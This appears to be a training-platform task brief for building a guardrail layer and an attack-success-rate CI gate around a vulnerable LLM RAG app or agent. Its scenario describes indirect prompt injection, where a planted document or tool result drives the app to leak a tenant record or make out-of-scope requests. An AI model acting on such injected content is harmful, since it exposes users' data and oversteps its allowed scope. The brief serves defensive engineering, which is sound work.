Build a Guardrail Layer and an Attack-Success-Rate CI Gate
Build the defensive control: an input/output guardrail layer that sits in front of a vulnerable LLM app. The starter kit provides the target, a probe battery, and a CI-gate harness that computes attack-success-rate (ASR) over the battery and fails the build when ASR crosses a threshold, used only as the pass/fail oracle. With your guardrail wired in, battery ASR must drop below the threshold and the gate must exit zero; the naive starter stub and a planted regression leave ASR over the line so the gate exits non-zero. A benign control suite must keep passing so you prove no over-blocking. Write a short remediation rationale and submit the project as a .zip for instant, rubric-based feedback.
3 hrs
Est. time
4
Outcomes
7
Rubric criteria
65%
Pass score
What you'll learn
Skills you'll have real reps in after shipping this.
The scenario
You own defense for a small Retrieval-Augmented Generation (RAG) assistant or tool-using agent that ships changes weekly. The offensive side already proved it: a planted document or tool result can drive the app into leaking a tenant record or firing an out-of-scope request, and a one-off manual fix does not survive the next prompt refactor. Your lead does not want another patch that quietly regresses. She wants a durable control and a gate that proves the control is still holding on every commit.
Your job is the defensive half of the red-team practice. Build a guardrail layer that mediates what reaches the model and what leaves it, then wire a CI gate that runs an attack battery, computes attack-success-rate, and fails the build when ASR crosses an agreed threshold. The exploit battery is your oracle, not your goal. The deliverable is the guardrail layer plus the gate logic: ASR below threshold with the guardrails on, the gate going red on a planted regression, and a benign control suite that keeps passing so you have not traded security for a broken product.
Your role
You are a defensive security engineer hardening an LLM application and standing up its regression gate. Your goal is a single, self-contained file that builds an input/output guardrail layer in front of a vulnerable target, runs a provided exploit battery as a deterministic oracle to measure attack-success-rate, and acts as a CI gate that fails the build when ASR crosses a threshold. You must show ASR below threshold with the guardrails on, a benign control suite still passing, and the gate firing red on a planted regression then green once it is reverted.
Start the task to unlock the full brief
You'll get the step-by-step requirements, setup commands, the 7-criterion grading rubric, tips, and the ability to submit your solution for instant AI grading.
Free to start · submit when you're ready
Learning resources
What this task is
This is a build-and-submit defensive-security task, not a quiz about guardrails. You build the control: an input/output guardrail layer that sits in front of a vulnerable LLM app. The starter kit provides the target, the probe battery, and a CI-gate harness that computes attack-success-rate (ASR) over the battery and fails the build when ASR crosses a threshold. The provided battery and harness are the pass/fail oracle, so the center of gravity is the control you ship, not the attack. This is the inverse of the offensive harness task: there you build the harness, here it is given and you build the defense it measures.
The skill here is durable, measurable defense. You screen or taint what reaches the model and mediate what leaves it with a sink-side control such as an egress allow-list (ipaddress and urlparse), a safe-markdown subset that drops auto-loaded images, or a parameterized tenant boundary. Then you prove it: ASR falls below the threshold with the guardrails on, a benign control suite keeps passing so you have not over-blocked, and a planted regression pushes ASR back over the line so the gate goes red, then green once reverted. This maps to OWASP LLM01 and LLM05, the OWASP Agentic Top 10 (ASI), and MITRE ATLAS, with the NIST AI RMF Measure and Manage functions as the framing.
Grading is rubric-based and explainable. Your submission is scored against weighted criteria (the guardrail layer being present and correct, ASR dropping below threshold, the gate going red on a planted regression and green once fixed, the benign suite still passing, a deterministic oracle, and the remediation rationale) with per-criterion feedback. The pass threshold is 65 percent and you can resubmit.